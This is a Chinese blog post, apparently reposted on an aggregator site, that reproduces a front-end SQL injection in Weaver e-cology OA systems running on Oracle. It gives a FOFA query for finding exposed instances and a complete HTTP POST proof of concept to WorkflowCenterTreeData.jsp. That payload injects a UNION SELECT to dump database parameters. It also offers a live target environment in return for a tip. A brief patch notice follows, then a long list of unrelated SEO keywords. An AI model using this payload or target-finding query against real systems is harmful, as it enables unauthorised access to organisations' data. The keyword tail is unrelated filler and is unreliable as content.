e-cology OA前台SQL注入漏洞复现是怎样的
发表于:2025-02-03 作者:千家信息网编辑
千家信息网最后更新 2025年02月03日,这篇文章给大家介绍e-cology OA前台SQL注入漏洞复现是怎样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。0x00 简介e-cology 提供了移动办公、微信办公、协同
千家信息网最后更新 2025年02月03日e-cology OA前台SQL注入漏洞复现是怎样的
这篇文章给大家介绍e-cology OA前台SQL注入漏洞复现是怎样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
0x00 简介
e-cology 提供了移动办公、微信办公、协同办公(OA)、流程管理、信息门户、知识管理、费控管理等功能,适用于手机和pc端,是当今比较主流的OA系统之一。
0x01 原理概述
该漏洞是由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞。
0x02 影响范围
使用oracle数据库的泛微 e-cology OA 系统
0x03 环境搭建
在线环境(限今晚):
打赏(任意金额)+转发,联系作者获取
FOFA搜索:
app="泛微-协同办公OA"
自行搭建:
公众号内回复"泛微环境"
0x04 漏洞利用
找到oracle数据库的泛微OA系统后直接使用Poc(已公开)
如果不存在漏洞,则显示结果如下
如果漏洞存在,则会直接回显很多数据
简洁版Poc如下:(勿用于非法途径)
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Connection: close
Upgrade-Insecure-Requests: 1
formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1
0x05 修复建议
官网已更新补丁,请尽快更新。
关于e-cology OA前台SQL注入漏洞复现是怎样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
数据
系统
办公
数据库
环境
前台
内容
更多
知识
帮助
更新
管理
不错
简洁
安全
主流
作者
信息
公众
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
长宁区工商软件开发销售价格
网络技术 发展前景 应用
网络安全案例分析介绍
郑鹏程四川党政数据库
怎么确定软件开发用什么编程语言
电子政务网络安全风险
双网口服务器如何接两个交换机
硅谷机房服务器好吗
元数据数据库设计
狼义网络技术公司
南京服务器散热片
系统管理不能登陆服务器
discuz 数据库表
政府网络安全防护方案
计算机网络技术技能型人才
部队网络安全保密心得
网络技术c语言
共守网络安全的海报
中专生网络技术专业
网络安全法手抄报没有字
数据库获取总行数
辽宁天河网络技术有限公司
华泰证券软件开发岗待遇
word重复数据库
系统坏了数据库怎么办
猎场官方服务器平台
阿里云数据库api
资产管理公司数据库
服务器管理员要求
ping内网服务器请求超时